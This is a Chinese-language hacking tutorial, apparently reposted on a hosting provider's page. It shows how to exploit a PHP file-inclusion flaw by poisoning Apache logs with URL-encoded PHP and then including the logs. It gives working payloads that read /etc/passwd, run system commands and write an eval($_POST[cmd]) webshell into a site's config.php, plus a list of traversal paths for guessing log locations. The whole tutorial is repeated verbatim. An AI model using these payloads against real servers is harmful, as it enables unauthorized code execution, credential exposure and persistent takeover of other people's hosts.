黑客滲透linux下載備份取shell

關于php包含Apache日志的利用,其實也就是利用提交的網址里有php語句，然后再被Apache服務器的日志記錄，然后php再去包含執行，從而包含了去執行。當然，這種辦法最大的弊端是Apache日志肯定會過大，回應的時候當然會超時什么的，所以也是受條件限制的。全當一種研究算了。下面是我的測試過程，我覺得很有意思，你也看看。
比如說，在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
以下是引用片段：
<? include($zizzy); ?>   //包含變量$zizzy

你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語句來查看一些系統環境和密碼檔文件。

那么關于日志包含下面我們來看：
比如我們的Apache的服務器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來包含一下httpd.conf，來看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息，這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數據日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的，一樣可以讀出來，只不過文件會很大，那也沒意思測試下去了，那怎么利用呢。

比如我們提交要提交這句，<?phpinfo();?> //查看php的相關信息
在這里，我們只能提交URL編碼模式，因為我在測試中發現，<?的標記并不被記錄，只有轉換成URL編碼提交才會被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉換過了的<?phpinfo();?>，我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會報出錯找不到頁面，而一出錯就被記在錯誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個日志文件就被包含成了phpinfo的信息，而回顯也就成了一個顯示php信息的頁面。

如果可以的話（能夠執行系統命令，也就是safe_mode開著的時候），
這樣子也不錯，
<?system("ls+-la+/home");?>   //執行命令列出home下的文件列表，記得轉換為URL格式哦。

/home/
total 9
-rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
-rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
-rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
-rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
-rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
-rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
-rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>，
這樣轉換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

因為上面那個很不實際，我在測試中發現日志動不動就是幾十兆，那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用，也比上面那種慢的要死好很多。

比如還是這句一句話木馬
<?eval($_POST[cmd]);?>  

到這里你也許就想到了，這是個很不錯的辦法。接著看,如何寫入就成了個問題，用這句，
fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件，然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務端語句。連起來表達成php語句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里寫入一句木馬語句

我們提交這句，再讓Apache記錄到錯誤日志里，再包含就成功寫入shell,記得一定要轉換成URL格式才成功。
轉換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。
我們再來包含日志，提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了，config.php里就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個就成了我們的webshell
直接用lanker的客戶端一連，主機就是你的了。

PS:上面講的，前提是文件夾權限必須可寫 ，一定要-rwxrwxrwx(777)才能繼續，這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑，你可以去猜，也可以參照這里。
附：收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log     
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

關于php包含Apache日志的利用,其實也就是利用提交的網址里有php語句，然后再被Apache服務器的日志記錄，然后php再去包含執行，從而包含了去執行。當然，這種辦法最大的弊端是Apache日志肯定會過大，回應的時候當然會超時什么的，所以也是受條件限制的。全當一種研究算了。下面是我的測試過程，我覺得很有意思，你也看看。
比如說，在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
以下是引用片段：
<? include($zizzy); ?>   //包含變量$zizzy

你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語句來查看一些系統環境和密碼檔文件。

那么關于日志包含下面我們來看：
比如我們的Apache的服務器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來包含一下httpd.conf，來看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息，這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數據日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的，一樣可以讀出來，只不過文件會很大，那也沒意思測試下去了，那怎么利用呢。

比如我們提交要提交這句，<?phpinfo();?> //查看php的相關信息
在這里，我們只能提交URL編碼模式，因為我在測試中發現，<?的標記并不被記錄，只有轉換成URL編碼提交才會被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉換過了的<?phpinfo();?>，我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會報出錯找不到頁面，而一出錯就被記在錯誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個日志文件就被包含成了phpinfo的信息，而回顯也就成了一個顯示php信息的頁面。

如果可以的話（能夠執行系統命令，也就是safe_mode開著的時候），
這樣子也不錯，
<?system("ls+-la+/home");?>   //執行命令列出home下的文件列表，記得轉換為URL格式哦。

/home/
total 9
-rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
-rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
-rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
-rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
-rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
-rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
-rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>，
這樣轉換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

因為上面那個很不實際，我在測試中發現日志動不動就是幾十兆，那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用，也比上面那種慢的要死好很多。

比如還是這句一句話木馬
<?eval($_POST[cmd]);?>  

到這里你也許就想到了，這是個很不錯的辦法。接著看,如何寫入就成了個問題，用這句，
fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件，然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務端語句。連起來表達成php語句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里寫入一句木馬語句

我們提交這句，再讓Apache記錄到錯誤日志里，再包含就成功寫入shell,記得一定要轉換成URL格式才成功。
轉換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。
我們再來包含日志，提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了，config.php里就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個就成了我們的webshell
直接用lanker的客戶端一連，主機就是你的了。

PS:上面講的，前提是文件夾權限必須可寫 ，一定要-rwxrwxrwx(777)才能繼續，這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑，你可以去猜，也可以參照這里。
附：收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log     
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

億恩科技地址(ADD)：鄭州市黃河路129號天一大廈608室 郵編(ZIP)：450008 傳真(FAX)：0371-60123888
   聯系：億恩小凡
   QQ：89317007
   電話:0371-63322206

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質保障！--億恩科技[ENKJ.COM]